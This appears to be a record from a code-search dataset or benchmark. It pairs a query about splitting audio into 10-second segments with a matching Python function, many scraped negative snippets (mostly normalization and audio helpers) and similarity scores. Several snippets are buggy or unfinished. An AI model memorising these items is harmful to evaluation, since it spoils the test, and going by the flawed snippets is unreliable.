np.ndarray:\n batch_img = batch_img.astype('float32')\n return batch_img / 127.5 - 1", "def apply_fourier_transform(chunked_audio):\n pass", "def normalize(x):\n # TODO: Implement Function\n data_max = np.max(x)\n data_min = np.min(x)\n x = (x - data_min) / (data_max - data_min)\n return x", "def normalise_0_1(arraylike):\n array_min = np.min(arraylike)\n array_max = np.max(arraylike)\n normalised = (arraylike - array_min) / (array_max - array_min)\n # convert to float\n normalised = np.array(normalised).astype(float)\n return normalised, array_min, array_max", "def min_max_normalize_one_image(image):\n\n image = image.astype(np.float32)\n for i in range(len(image)):\n max_int = image[i].max()\n min_int = image[i].min()\n image[i] = (image[i] - min_int) / (max_int - min_int)\n\n return image", "def normalize(self, factor):", "def _normalize(array):\n\treturn (array - np.min(array))/(np.max(array)-np.min(array))", "def wavread(filename):\n\n\tif (os.path.isfile(filename) == False): # raise error if wrong input file\n\t\traise ValueError(\"Input file is wrong\")\n\n\tfs, x = read(filename)\n\n\tif (len(x.shape) !=1): # raise error if more than one channel\n x = np.mean(x,axis = 1)\n\t\tprint \"Audio file is stereo, converting to mono\"\n\n\t#scale down and convert audio into floating point number in range of -1 to 1\n\tx = np.float32(x)/norm_fact[x.dtype.name]\n\treturn fs, x", "def normalize(v):\n\n return v * (1.0 / magnitude(v))", "def remove_silence_audio() -> None:\n # Read the wav file and get rate and list of data\n rate, data = scipy.io.wavfile.read('Test.wav')\n\n # Create list for data of amended wav file\n 
data2 = []\n\n # Loop through data of original file and add data that doesn't meed condition: values >= -10 and <= 10\n for i in range(len(data)):\n if data[i][0] >= -10 and data[i][0] <= 10:\n pass\n else:\n data2.append(data[i])\n\n # Create NumPy array from revised data\n data2 = np.asarray(data2, dtype=np.int16)\n\n # Write new data to wav file\n scipy.io.wavfile.write('Test.wav', rate, data2)\n\n return None", "def normalize_image(image):\n return image / 255.", "def data_normalize (self, data):\r\n data = data + (2**15)\r\n data = data / ((2**16) - 1)\r\n data = 2 * data\r\n data = data - 1\r\n\r\n return data", "def normalization(sample):\n sample = sample + 100\n # 2^20 = 1048576\n return np.log2(sample * 1048576/np.sum(sample))", "def normalization(image):\n return (image - np.min(image)) / (np.max(image) - np.min(image))", "def normalizeToRange(data,max=255,min=0):\n if min: return (max-min)*normalize(data)+min\n else: return max*normalize2(data) # speeds up operation", "def normalize_image(image):\n image = image.astype(np.float32) / 255.0\n\n return image", "def range_as_mono(self, start_sample, end_sample):\n tmp_current = self.current_frame\n self.current_frame = start_sample\n tmp_frames = self.read_frames(end_sample - start_sample)\n if self.channels == 2:\n frames = np.mean(tmp_frames, axis=1)\n elif self.channels == 1:\n frames = tmp_frames\n else:\n raise IOError(\"Input audio must have either 1 or 2 channels\")\n self.current_frame = tmp_current\n return frames", "def normalise(self, spectrum):\n\n return spectrum", "def normalise(self, spectrum):\n\n return spectrum", "def itensity_normalize_one_volume(volume):\n pixels = volume[volume > 0]\n mean = pixels.mean()\n std = pixels.std()\n out = (volume - mean)/std\n out_random = np.random.normal(0, 1, size = volume.shape)\n out[volume == 0] = out_random[volume == 0]\n return out", "def itensity_normalize_one_volume(volume):\n pixels = volume[volume > 0]\n mean = pixels.mean()\n std = pixels.std()\n out = (volume - mean)/std\n # random normal too slow\n #out_random = np.random.normal(0, 1, size = volume.shape)\n out_random = np.zeros(volume.shape)\n out[volume == 0] = out_random[volume == 0]\n return out", "def normalize_array(image_array):\n\n array = image_array.astype(np.float)\n array /= 255.0\n return array", "def normalize(self, headroomInDB):\n self.headroom = headroomInDB\n print (\"Normalizing %s to %1.3f dB limit of max.\" \n % (self.audiofile, self.headroom))", "def normalize(image):\n min = np.min(image)\n max = np.max(image)\n normalImg = 255*(image - min) / (max - min)\n return normalImg", "def normalize(self, mag=1.0):\n\n def f(dataset, s, null, mag):\n dataset[s] -= null\n dataset[s] /= mag\n\n if self.signed:\n mag = self.mag() / mag\n else:\n mag = self.max() / mag\n self.chunkwise(f, null=self.null, mag=mag)\n self._null = 0", "def normalise(dataset):\n # Scale images to the [0, 1] range\n dataset = dataset.astype(\"float32\") / 255\n # Make sure images have shape (28, 28, 1)\n return np.expand_dims(dataset, -1)", "def normalize(arr):\n m = np.min(arr)\n arr = arr - m\n M = np.max(arr)\n arr = arr / M\n return arr", "def normalize_to_zero_one(x):\n return x - torch.min(x) / (torch.max(x) - torch.min(x))", "def normalise(self):\n return self.map_channels(lambda component: float(component) / 255.0)", "def normalize(self):\n self.image = rescale_intensity(self.image, out_range=(0, 255))", "def normalize2(data):\n return old_div(data,np.max([np.max(data),-1.0*np.min(data)]))", "def 
normalize_volume(vol_data):\n h, w, d = np.shape(vol_data)\n mean = np.sum(vol_data)/(h*w*d)\n std = np.std(vol_data)\n return (vol_data - mean) / std", "def normalize(image):\n image = image.astype(np.float32)\n mean = np.mean(image)\n std = np.std(image)\n if std > 0:\n ret = (image - mean) / std\n else:\n ret = image * 0.\n return ret", "def normalize(x):\n a = 0\n b = 1\n scale_min = 0\n scale_max = 255\n return a + ( ( (x - scale_min)*(b - a) )/( scale_max - scale_min ) )", "def denormalize(data):\n\treturn np.int16(data/np.max(np.abs(data)) * 32767)", "def normalize(img):\r\n return ((img / 255.0) - 0.5) / 0.5", "def normalize_data(data=None):\n # Data pre-processing\n n = data.shape[0]\n for i in range(n):\n xx = data[i,:,:]\n xx -= np.mean(xx) # Centering in 0\n xx /= np.linalg.norm(xx) # Normalizing to 1\n data[i] = xx # Affect value\n return data", "def normalise( self, rWantedMax = 100. ):\n nWantedMax = int( self.getSampleMaxValue() * rWantedMax / 100)\n nCurrentMax = max( self.data.max(), -self.data.min() )\n rRatio = nWantedMax / float(nCurrentMax)\n if( nCurrentMax == nWantedMax ):\n return False\n logging.info( \"nCurrentMax: %s\" % nCurrentMax )\n logging.info( \"nWantedMax: %s\" % nWantedMax ) \n logging.info( \"applying a %f ratio to the whole sound\" % rRatio )\n self.data *= rRatio # another option is to make a np.round(self.data*rRatio), but it's perhaps less linear (on a linear elevation for example)\n return True", "def unnormalize_sample(sample_data):\n BASE = 255\n return np.array(np.around(sample_data*BASE), dtype='uint8')", "def normalize_image(img):\n min_, max_ = float(np.min(img)), float(np.max(img))\n return (img - min_) / (max_ - min_)", "def normalize(a, new_max=1.0):\n a = (a - a.min())\n a = a/a.max()\n a *= new_max\n return a", "def normalize_data_unit_interval(data):\n if data.dtype == 'float32':\n return\n return data.astype('float32') / 255.0", "def normalize(data):\n min = np.min(data)\n if min:\n data = data + min\n return old_div(data,np.max(data))\n else: # if min is 0\n return old_div(data,np.max(data))", "def _normalize(self, x):\n # TODO: imagenet normalization\n\n return x", "def normalize(im: np.ndarray) -> np.ndarray:\n im = im.astype(np.float32)\n return (im - im.min()) / (im.max() - im.min())", "def normalize(self):\n d = learning_utils.convert_data_to_2d(self._data)\n d = learning_utils.normalize_2d(d)\n self._data = learning_utils.convert_data_to_1d(d)", "def normalize(array):\n quat = np.array(array)\n return quat / np.sqrt(np.dot(quat, quat))", "def read_audiofile(audio_name,cutToLength):\n fs, data = wavfile.read(audio_name)\n # sa.play_buffer(audio_data, num_channels, bydeftes_per_sample,sample_rate)\n #play_obj = sa.play_buffer(data,1,2,fs)\n #play_obj.stop()\n # delete one column. 
Make mono channel\n if data.shape[1]>1:\n data = numpy.delete(data,1,1)\n #downsample if signal is broad\n if fs>24000:\n data = numpy.delete(data, numpy.s_[::2], 0)\n fs = int(fs/2)\n \n data = data[data!=0]\n data = numpy.delete(data,numpy.s_[ int(cutToLength*fs):len(data)] )\n return data", "def cut_audio(old_path, new_path, start, end):\r\n fs, data = wavfile.read(old_path)\r\n indx_start = int(start*fs)\r\n indx_end = int(end*fs)+1\r\n wavfile.write(new_path,fs,data[indx_start:indx_end])\r\n\r\n return True", "def scale0to1(img):\r\n\r\n img = img.astype(np.float32)\r\n\r\n min = np.min(img)\r\n max = np.max(img)\r\n\r\n if np.absolute(min-max) < 1.e-6:\r\n img.fill(0.5)\r\n else:\r\n img = (img-min) / (max-min)\r\n\r\n return img.astype(np.float32)", "def normalize(data):\n\n\t#return [float(x) / pow(2, 15) for x in data]\n\n\tl = [float(x) / pow(2, 15) for x in data]\n\treturn np.asarray(l)", "def _normalize_range():\n clipped = tf.clip_by_value(inputs, self.minimum, self.maximum)\n return -1 + 2 * (clipped - self.minimum) / length", "def normalize(image, label):\n image -= settings.DATASET_MEAN\n image /= settings.DATASET_STD\n\n return image, label", "def _normalize(self):\r\n self.dataframe['norm_intensity'] = self.dataframe['intensity']\r\n self.dataframe['norm_intensity'] -= self.dataframe['norm_intensity'].min()\r\n self.dataframe['norm_intensity'] /= self.dataframe['norm_intensity'].max() * 0.01", "def normalization(seq):\n\t\tnew_seq = [6.3578286171 * x for x in seq]\n\t\treturn new_seq", "def normalize_image(img_arr_uint):\n return img_arr_uint.astype(np.float64) * ONE_BYTE_SCALE", "def normalize(self):\n self._data /= self.norm()", "def __normalize(input, type, a, b):\n return cv2.normalize(input, None, a, b, type)", "def normalize(img):\r\n min = img.min()\r\n max = img.max()\r\n x = 2.0 * (img - min) / (max - min) - 1.0\r\n return x", "def normalize(self, m1=0., m2=1.):\n self.img = self.img - self.img.min()\n self.img = self.img / self.img.max()\n\n self.img = self.img * (m2 - m1) + m1", "def normalize_image(img):\n\n # Load image and convert to grayscale\n img = rgb2gray(img)\n\n # Normalize values, range 0 to 255\n img = (img - img.min()) / (img.max() - img.min())\n img *= 255\n\n # Make int values\n img = img.astype(int)\n\n # Return new image\n return img", "def normalize(img):\n # TODO: implement this function.\n min_img = min([min(i) for i in img])\n max_img = max([max(i) for i in img])\n\n for i in range(len(img)):\n \tfor j in range(len(img[0])):\n \t\timg[i][j] = ((img[i][j] - min_img) / (max_img - min_img))\n #raise NotImplementedError\n return img", "def normalized(array):\n ptp = np.ptp(array)\n if ptp == 0:\n ptp = 1\n return (array - np.min(array)) / ptp", "def normalize(arr: np.ndarray) -> np.ndarray:\n if max(arr) - min(arr) == 0:\n logger.warning(\n \"Normalize averted a div/0, the input data was:\\n {0}\".format(arr)\n )\n return np.ones(len(arr))\n return (arr - min(arr)) / (max(arr) - min(arr))", "def normalization(img):\n max_val = img.max()\n min_val = img.min()\n\n return ((img-min_val)*255)/(max_val-min_val)", "def normalise_image(image, use_torch=True):\n if use_torch:\n image = torch.abs(image)\n else:\n image = np.abs(image)\n if (image.max() - image.min()) < 1e-5:\n return image - image.min() + 1e-5\n else:\n return (image - image.min()) / (image.max() - image.min())", "def normalize_image(img):\n arr = np.array(img)\n new_img = Image.fromarray(normalize(arr).astype('uint8'),'L')\n return new_img", "def normalize_and_clip(meas):\n 
frequency_weights = np.zeros(len(meas))\n\n for i in range(len(meas)):\n if(meas[i] > NORMALIZE_SENS[i]):\n meas[i] = NORMALIZE_SENS[i]\n frequency_weights[i] = meas[i] / NORMALIZE_SENS[i]\n\n return frequency_weights", "def normalise(values):\n max_value = max(values)\n min_value = min(values)\n factor = 32767.0 / max(max_value, abs(min_value))\n return (int(v * factor) for v in values)", "def normalize(img):\n tol = 355\n maxi = np.max(img)\n if maxi > tol:\n img = 255 * (img - (tol - 255)) / maxi\n # end if\n\n norm = np.round(img)\n norm[norm < 0] = 0\n norm[norm > 255] = 255\n\n return norm", "def normalize_image(im):\n pixels = im.flatten()\n\n # scale pixels to range 0 to 1\n normalized_im = (pixels - np.min(pixels)) / (np.max(pixels) - np.min(pixels))\n\n # scale the pixels by 255\n normalized_im = (normalized_im.reshape(im.shape) * 255).astype(np.uint8)\n\n return normalized_im", "def normalize(data):\n data_range = data.max() - data.min()\n #if data_range == 0.:\n # sys.exit(\"data.max() - data.min() == 0. !\")\n if stddev != 0.:\n data = (data - data.min()) / data_range\n\n return data", "def minmax_normalize(samples, out=None):\n if out is None:\n dtype = np.common_type(np.empty(0, 'float32'), samples)\n out = np.array(samples, dtype=dtype, copy=True)\n else:\n out[:] = samples\n\n sample_mins = np.min(samples, -1)[..., None]\n sample_maxes = np.max(samples, -1)[..., None]\n out -= sample_mins\n out /= (sample_maxes - sample_mins)\n return out" ]
[ "0.6990606", "0.69585127", "0.6922056", "0.6835355", "0.6835355", "0.66305023", "0.64685136", "0.64316094", "0.6400724", "0.6398994", "0.63599336", "0.6334538", "0.63280183", "0.62815994", "0.62611055", "0.62473464", "0.6237534", "0.6221386", "0.6176301", "0.6140515", "0.6132791", "0.6123954", "0.60941035", "0.6029671", "0.6020562", "0.6014642", "0.59951377", "0.597458", "0.59674263", "0.59554684", "0.59541005", "0.59539086", "0.59530973", "0.59443635", "0.5933671", "0.59287375", "0.5926318", "0.59221166", "0.5910866", "0.5906473", "0.5906419", "0.5900829", "0.5878886", "0.5872488", "0.5871823", "0.5871823", "0.58546907", "0.5852504", "0.5849053", "0.58447987", "0.5843516", "0.5838141", "0.58376426", "0.5831355", "0.58088994", "0.58076394", "0.5799226", "0.5794051", "0.5790485", "0.5772984", "0.5760764", "0.57605433", "0.57459086", "0.5745667", "0.57441515", "0.57316947", "0.57308096", "0.57295924", "0.5724631", "0.5719238", "0.5715826", "0.57121783", "0.5709629", "0.5707682", "0.5695518", "0.56933105", "0.56827265", "0.5679549", "0.5677347", "0.56761014", "0.5667166", "0.5663434", "0.5659912", "0.56489897", "0.56477076", "0.5643934", "0.5643317", "0.5640471", "0.5633311", "0.5617787", "0.56072813", "0.5605533", "0.55942214", "0.5590934", "0.5582964", "0.5581116", "0.55779654", "0.55760396", "0.55708295", "0.5564736" ]
0.78221744
0
Load an audio file and divide into 10 second segments.
def segment_10s(audio, sr):\n    seg_files = {}\n    n_seg = int((len(audio)/sr)/10)\n    for i in range(n_seg):\n        segment = audio[10*i*sr:(i+1)*10*sr]\n        seg_files[i] = segment\n    return seg_files
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, secs, path, concat=True):\n audio = np.empty((1,))\n secs_loaded = 0\n files_loaded = 0\n files = glob.glob(path + \"*.wav\")\n for file in files:\n (sr, samples) = wavfile.read(file)\n audio = np.concatenate((audio, samples))\n\n # Keep track of the duration (in seconds) of our audio clip\n dur = len(samples) / sr\n secs_loaded = secs_loaded + dur\n files_loaded = files_loaded + 1\n if (secs_loaded >= secs):\n break\n if not concat:\n break\n \n # We're assuming that all files use the same sampling frequency.\n # Truncate audio samples so that we end up with the duration specified.\n total_samples = int(round(secs * sr))\n if total_samples > len(audio):\n warnings.warn(\"Found fewer than %.2f seconds of audio. \"\n \"Returning %.2f seconds of audio.\" % (secs, len(audio) / sr)) \n audio = audio[0:total_samples]\n\n self.audio = audio\n self.sampling_rate = sr", "def filesample(filename):\n sampling_rate, samples = wavfile.read(filename)\n times = np.arange(len(samples)) / sampling_rate\n return samples, sampling_rate", "def load_audio(file_path):\n # load the audio file in its original sampling rate\n audio_data, sr = librosa.load(file_path, sr=sampling_rate)\n\n # get the common file name\n file_name = file_path.split(\"/\")[-1]\n file_name = file_name.split(\".wav\")[0]\n\n # calculate number of samples in the time duration needed\n num_samples = int(sr*time_duration)\n\n # get the cut-off audio signals and save them\n for i in np.arange(num_audio_files):\n audio_cut_data = cut_sample(audio_data, num_samples)\n file_path=dir_to_save + file_name + \"_\" + str(i+1) + \".wav\"\n save_sample(audio_cut_data, file_path, sr)\n print(f\"generating signal {str(i)}, its length {len(audio_cut_data)} by cutting the original signal\")", "def segment(sound_file, spec_file, ms_step, pix_per_s, sound_output_dir, spec_output_dir):\n pix_per_ms = pix_per_s/1000\n sound = AudioSegment.from_wav(sound_file)\n start, stop = 0, ms_step\n start_pixel, stop_pixel = start*pix_per_ms, stop*pix_per_ms\n spec = Image.open(spec_file)\n chopping = True\n while stop <= len(sound):\n \n # Split sound\n chunk = sound[start:stop]\n chunk.export(sound_output_dir + sound_file.split(\"/\")[-1].split(\".\")[0] + \"_\" + str(start) + \"-\" + str(stop) + \".wav\", format=\"wav\")\n\n # Split spectrogram\n w, h = spec.size\n cropped_spec = spec.crop((start_pixel, 0, stop_pixel, h))\n cropped_spec.save(spec_output_dir + sound_file.split(\"/\")[-1].split(\".\")[0] + \"_\" + str(start) + \"-\" + str(stop) + \".png\")\n\n start += ms_step\n stop += ms_step\n start_pixel, stop_pixel = start*pix_per_ms, stop*pix_per_ms", "def load_audio(self):\n df = pd.read_csv(\"{dir}/iteration_{iter}.csv\".format(dir=self.directory, iter=self.iteration),\n usecols=[1, 2, 3])\n\n doa_from_file = df.iloc[0][1]\n wav_name = df.iloc[0][0]\n filename = \"{dir}/{wav_name}\".format(dir=self.directory, wav_name=wav_name)\n\n y, sr = librosa.load(filename, mono=False)\n\n y_8k = librosa.resample(y, sr, 8000)\n result_x = librosa.util.fix_length(y_8k, 8000)\n\n return result_x, doa_from_file", "def play_audio(filename):\n chunk = 1024\n wf = wave.open(filename, 'rb')\n pa = pyaudio.PyAudio()\n stream = pa.open(\n format=pa.get_format_from_width(wf.getsampwidth()),\n channels=wf.getnchannels(),\n rate=wf.getframerate(),\n output=True\n )\n data_stream = wf.readframes(chunk)\n while data_stream:\n stream.write(data_stream)\n data_stream = wf.readframes(chunk)\n stream.close()\n pa.terminate()", "def file_generator(files: list,\n 
segment_duration: float,\n sampleRate: int,\n db_thr: float or None = None,\n frame_length: int = 512,\n hop_length: int = 128,\n ) -> None:\n\n I = 0\n J = 0\n\n segment = np.zeros((int(segment_duration*sampleRate),))\n\n k = 0\n file_no = 0\n\n while True:\n if I >= len(segment):\n yield segment\n segment = np.zeros((int(segment_duration*sampleRate),))\n I = 0\n\n if k == 0 or J >= len(y):\n J = 0\n y, sr = librosa.core.load(files[file_no], mono=True, sr=sampleRate)\n file_no += 1\n\n if file_no == len(files):\n break\n\n # Normalize\n y = y/y.max()\n\n # Remix non-silent segments\n if db_thr is not None:\n # Figure out intervals of non-silence (NOTE: Is the threshold right? -- 60db quiet)\n intervals = librosa.effects.split(y, frame_length=frame_length, hop_length=hop_length, top_db=db_thr)\n\n # Remix according to those intervals\n y = librosa.effects.remix(y, intervals)\n\n if len(segment[I:]) >= len(y[J:]):\n segment[I:I+len(y[J:])] = y[J:]\n I = I + len(y[J:])\n J = J + len(y[J:])\n else:\n segment[I:] = y[J:J+len(segment[I:])]\n J = J + len(segment[I:])\n I = I + len(segment[I:])\n k += 1", "def read_audiofile(audio_name,cutToLength):\n fs, data = wavfile.read(audio_name)\n # sa.play_buffer(audio_data, num_channels, bydeftes_per_sample,sample_rate)\n #play_obj = sa.play_buffer(data,1,2,fs)\n #play_obj.stop()\n # delete one column. Make mono channel\n if data.shape[1]>1:\n data = numpy.delete(data,1,1)\n #downsample if signal is broad\n if fs>24000:\n data = numpy.delete(data, numpy.s_[::2], 0)\n fs = int(fs/2)\n \n data = data[data!=0]\n data = numpy.delete(data,numpy.s_[ int(cutToLength*fs):len(data)] )\n return data", "def silence_intervals(file_path,file_name):\r\n nsil_start_time=[]\r\n nsil_end_time=[]\r\n sil_start_time=[]\r\n sil_end_time=[]\r\n #read file \r\n audio, sample_rate = librosa.load(os.path.join(file_path,file_name))\r\n \r\n #silence extraction using librosa\r\n nsil_intv=librosa.effects.split(audio, top_db=30).astype('float32') / sample_rate\r\n \r\n #silence extraction using pyAudioanalysis\r\n # [Fs, x] = aIO.readAudioFile(os.path.join(file_path,file_name))\r\n # nsil_intv = np.array(aS.silenceRemoval(x, Fs, 0.020, 0.020, smoothWindow = 0.7, Weight = 0.3, plot = False))\r\n # print \"non-sil segments=\"+str(nsil_intv)\r\n\r\n #silence detection using webrtcvad (voice activity detection)\r\n #nsil_intv=np.array(vad_webrtcvad(file_path,file_name))\r\n\r\n\r\n dur=librosa.get_duration(y=audio, sr=sample_rate)\r\n print nsil_intv\r\n print dur\r\n print sample_rate\r\n curr_sil_start=0.0\r\n curr_sil_end=0.0\r\n for i in range(nsil_intv.shape[0]):\r\n nsil_start_time.append(nsil_intv[i][0])\r\n #sil_start_time=list(np.array(sil_start_time)/sample_rate)\r\n\r\n nsil_end_time.append(nsil_intv[i][1])\r\n #sil_end_time=list(np.array(sil_end_time)/sample_rate)\r\n\r\n for i in range(len(nsil_start_time)):\r\n curr_sil_end=nsil_start_time[i]\r\n sil_start_time.append(str(curr_sil_start))\r\n sil_end_time.append(str(curr_sil_end))\r\n curr_sil_start=nsil_end_time[i]\r\n\r\n print sil_start_time\r\n print sil_end_time\r\n return sil_start_time,sil_end_time", "def segment_audio(filename, y_value, split='train', clf='gender'):\n\n filepath = 'recordings/recordings/' + filename + '.mp3'\n audio, sr = librosa.load(filepath, sr=16000)\n audio = normalize(audio)\n\n # Add gender label to filename for later processing\n sex = y_value\n if sex == 'female':\n filename = '{}.F'.format(filename)\n else: filename = '{}.M'.format(filename)\n\n # Segment audio file\n seg_files = 
segment_10s(audio, sr)\n\n for key, val in seg_files.items():\n new_name = '{}.{}'.format(filename, key)\n sf.write('data/{}/{}/{}o.wav'.format(clf, split, new_name), val, sr)", "def audioRead(path):\n data, samplerate = sf.read(path)\n frames = data.shape[0]\n channels = len(data.shape)\n duration = 1/samplerate*frames\n return data, samplerate, path, duration, frames, channels", "def graph_spectrogram(audio_file):\n secs_per_spec = 10\n data, rate = librosa.core.load(audio_file)\n split_data = split_list_by_num_samples(data, rate * secs_per_spec)\n\n random.shuffle(split_data)\n\n # if songs longer than 100 seconds, take the first 10 images, since its shuffled\n if len(split_data) > 10:\n split_data = split_data[:10]\n\n pool = Pool()\n results = [pool.apply_async(audio_sample_to_img, args=(sample, rate, secs_per_spec)) for sample in split_data]\n specs = [p.get() for p in results]\n\n return specs", "def direct_play(file_name,\n sample_rate = 44100,\n chunk = 1024,\n channel = 1,\n width = 2):\n \n data_file = open(file_name, 'rb', chunk)\n\n # PyAudio instance\n p = pyaudio.PyAudio()\n\n # Open stream\n stream = p.open(format = p.get_format_from_width(width),\n channels = channel,\n rate = sample_rate,\n output = True)\n\n data = data_file.read(chunk)\n\n # Playing the data\n while data != \"\":\n stream.write(data)\n data = data_file.read(chunk)\n\n # Ending things\n stream.stop_stream()\n stream.close()\n p.terminate()", "def _load(self, filepath):\n import subprocess as sp\n command = ['ffmpeg',\n '-i', filepath,\n '-f', 's16le',\n '-acodec', 'pcm_s16le',\n '-ac', '1'] # channels: 2 for stereo, 1 for mono\n if self.sampling_rate != SAMPLING_RATE:\n command.extend(['-ar', str(self.sampling_rate)])\n command.append('-')\n # 30s at 44.1 kHz ~= 1.3e6\n proc = sp.run(command, stdout=sp.PIPE, bufsize=10**7, stderr=sp.DEVNULL, check=True)\n\n return np.fromstring(proc.stdout, dtype=\"int16\")", "def stream_file(filename):\n wf = wave.open(filename, 'rb')\n # read in ~100ms chunks\n chunk = int(wf.getframerate() / 10)\n data = wf.readframes(chunk)\n while True:\n try:\n while connected:\n if data != '' and len(data) != 0:\n sio.emit('data', data)\n # sleep for the duration of the audio chunk\n # to mimic real time playback\n sio.sleep(0.1)\n data = wf.readframes(chunk)\n else:\n print('EOF, pausing')\n sio.sleep(0.5)\n wf = wave.open(filename, 'rb')\n data = wf.readframes(chunk)\n print('restarting playback')\n sio.sleep(0.2)\n except socketio.exceptions.ConnectionError as err:\n print('Connection error: %s! 
Retrying at %s' %\n (err, datetime.utcnow()))\n except KeyboardInterrupt:\n return", "def spectrogram_from_file(filename, step=10, window=20, max_freq=None,\n eps=1e-14, time_up=12, time_down=2):\n sample_rate, audio = wavfile.read(filename) \n audio = audio / np.sqrt(np.sum(np.square(audio)))\n if audio.ndim >= 2:\n audio = np.mean(audio, 1)\n if max_freq is None:\n max_freq = sample_rate / 2\n if max_freq > sample_rate / 2:\n raise ValueError(\"max_freq must not be greater than half of \"\n \" sample rate\")\n if step > window:\n raise ValueError(\"step size must not be greater than window size\")\n hop_length = int(0.001 * step * sample_rate)\n fft_length = int(0.001 * window * sample_rate)\n pxx, freqs = spectrogram(\n audio, fft_length=fft_length, sample_rate=sample_rate,\n hop_length=hop_length)\n ind = np.where(freqs <= max_freq)[0][-1] + 1\n\n # audio record time limit\n is_saved = False\n sample_time = int(len(audio) / sample_rate * 1000)\n if sample_time <= time_up * 1000 and sample_time >= time_down * 1000:\n is_saved = True\n\n return np.transpose(np.log(pxx[:ind, :] + eps)), is_saved", "def direct_record(file_name,\n time,\n chunk = 1024,\n sample_rate = 44100,\n format = pyaudio.paInt16,\n channel = 1):\n\n p = pyaudio.PyAudio()\n\n stream = p.open(format = format,\n channels = channel,\n rate = sample_rate,\n input = True,\n frames_per_buffer = chunk)\n\n frames = []\n\n for i in range(0, int(sample_rate / chunk * time)):\n data = stream.read(chunk)\n frames.append(data)\n\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n data_file = open(file_name, 'wb', chunk)\n data_file.write(b''.join(frames))\n data_file.close()", "def split_multiple_recordings_file(file_path, min_silence_duration=0.25, noise_threshold=150):\n print(file_path)\n rate, audio = scipy.io.wavfile.read(file_path)\n split_recordings = split_multiple_recordings(audio, min_silence_duration=min_silence_duration,\n noise_threshold=noise_threshold, sample_rate_hz=rate)\n\n if file_path.count('.') != 1:\n raise Exception('File_path must contain exactly one period, usually in extension. 
IE: /home/test.wav')\n\n for idx, recording in enumerate(split_recordings):\n print(\"spliting \" + file_path)\n new_file_path = file_path.split('.')[0] + '_' + str(idx) + \".wav\"\n scipy.io.wavfile.write(new_file_path, rate, recording)", "def load_wav_16k_mono(self, filename):\n filename = utils.get_file_path('webapp/static/processed', filename)\n\n file_contents = tf.io.read_file(filename)\n wav, sample_rate = tf.audio.decode_wav(file_contents,\n desired_channels=1)\n wav = tf.squeeze(wav, axis=-1)\n sample_rate = tf.cast(sample_rate, dtype=tf.int64)\n wav = tfio.audio.resample(wav, rate_in=sample_rate, rate_out=16000)\n return wav", "def gen_random_samples():\n if os.path.exists('Song_Samples'):\n pass\n else:\n os.mkdir('Song_Samples')\n for filename in os.listdir(\"Songs\"):\n rate, data = wavfile.read(os.path.join(\"Songs\", filename))\n song_duration = len(data) // rate\n start_point = randint(0, song_duration - SAMPLE_DURATION)\n end_point = start_point + SAMPLE_DURATION\n subprocess.call(['ffmpeg', '-i', os.path.join(\"Songs\", filename),\n '-ss', str(datetime.timedelta(seconds=start_point)), '-to',\n str(datetime.timedelta(seconds=end_point)), '-y', os.path.join(\"Song_Samples\", filename)])", "def divide_chunks(audio_file_, chunksize):\n\n for j in range(0, len(audio_file_), self.chunksize):\n yield audio_file[j:j + chunksize]", "def split_on_silence_threshold(wav_file, dest_dir):\n # Read the file\n audioSegment = AudioSegment.from_wav(wav_file)\n # Calculating the silence threshold\n # Normalizing the audio file belfore finding the threshold\n full_audio_wav = normalize(audioSegment)\n loudness_ms_list = [] # Save the audio levels of all the chunks\n for ms_chunk in full_audio_wav:\n loudness_ms_list.append(round(ms_chunk.dBFS))\n print(\"Audio levels are recorded\", file=sys.stderr)\n # Using pandas df for easier manipulation\n df = pd.DataFrame(loudness_ms_list)\n df[0] = df[df[0] != float(\"-inf\")] # Remove the very low levels\n st = df[0].mean()\n st = st if st < -16 else -16 # Because -16db is default\n # Splits the audio if silence duration is MSL long\n MSL = 500 # minimum silence length in ms\n chunks = split_on_silence(\n full_audio_wav, \n # split on silences longer than 500ms (500ms)\n min_silence_len=MSL, \n # anything under -16 dBFS is considered silence\n silence_thresh=st, \n # keep 200 ms of leading/trailing silence\n keep_silence=200, \n )\n # Saving all the chunks\n print(\"Writing all the files, this may take some time!\", file=sys.stderr)\n for index, chunk in enumerate(chunks):\n chunk_file_name = os.path.join(dest_dir, \"sample_{}.wav\".format(str(index).zfill(10)))\n print(\"Saving the file to \" + chunk_file_name, file=sys.stderr)\n # You can export as mp3 etc, note that it has dependency on ffmpeg\n chunk.export(chunk_file_name, format=\"wav\")", "def simp(filename, seconds_per_average=0.001):\n wavefile = wave.open(filename, 'rb')\n print \"# gnuplot data for %s, seconds_per_average=%s\" % \\\n (filename, seconds_per_average)\n print \"# %d channels, samplewidth: %d, framerate: %s, frames: %d\\n# Compression type: %s (%s)\" % wavefile.getparams()\n\n framerate = wavefile.getframerate() # frames / second\n frames_to_read = int(framerate * seconds_per_average)\n print \"# frames_to_read=%s\" % frames_to_read\n\n time_and_max = []\n values = []\n count = 0\n while 1:\n fragment = wavefile.readframes(frames_to_read)\n if not fragment:\n break\n\n # other possibilities:\n # m = audioop.avg(fragment, 2)\n # print count, \"%s %s\" % 
audioop.minmax(fragment, 2)\n\n m = audioop.rms(fragment, wavefile._framesize)\n time_and_max.append((count, m))\n values.append(m)\n count += frames_to_read\n # if count>1000000:\n # break\n\n # find the min and max\n min_value, max_value = min(values), max(values)\n points = [] # (secs,height)\n for count, value in time_and_max:\n points.append((count/framerate,\n (value - min_value) / (max_value - min_value)))\n return points", "def slice_recording(path_recording, path_metadata_filepath_duration):\n\n metadata_filepath_duration = open(path_metadata_filepath_duration, 'r')\n\n start = 0.0\n\n for line in metadata_filepath_duration:\n filepath, duration = line.split(\" | \")\n target_filepath = re.sub('/Mixtures/', '/mic_recordings/Mixtures/', filepath)\n target_parentpath = re.sub('/mixture.wav', '', target_filepath)\n\n # creating folder if the folder doesnot exist\n try:\n os.makedirs(target_parentpath)\n except OSERROR as exception:\n if exception.errno == errno.EEXIST and os.path.isdir(target_parentpath):\n pass\n\n delta_t = float(duration)\n\n # calling ffmpeg to slice the wav file into its respective sizes\n subprocess.call([\"ffmpeg\", \"-i\", path_recording, \"-ss\", str(start), \"-t\", str(delta_t), \"-acodec\", \"copy\", target_filepath])\n\n # resetting the start for next file in line\n start += delta_t\n\n metadata_filepath_duration.close()", "def micsample(listentime):\n frames, sampling_rate = record_audio(listentime)\n samples = np.hstack([np.frombuffer(i, np.int16) for i in frames])\n times = np.arange(samples.size) / sampling_rate\n return samples, times", "def preprocessing(filename):\n reporting(\"Preprocessing file...\", True)\n chdir(path.dirname(filename))\n (rate, 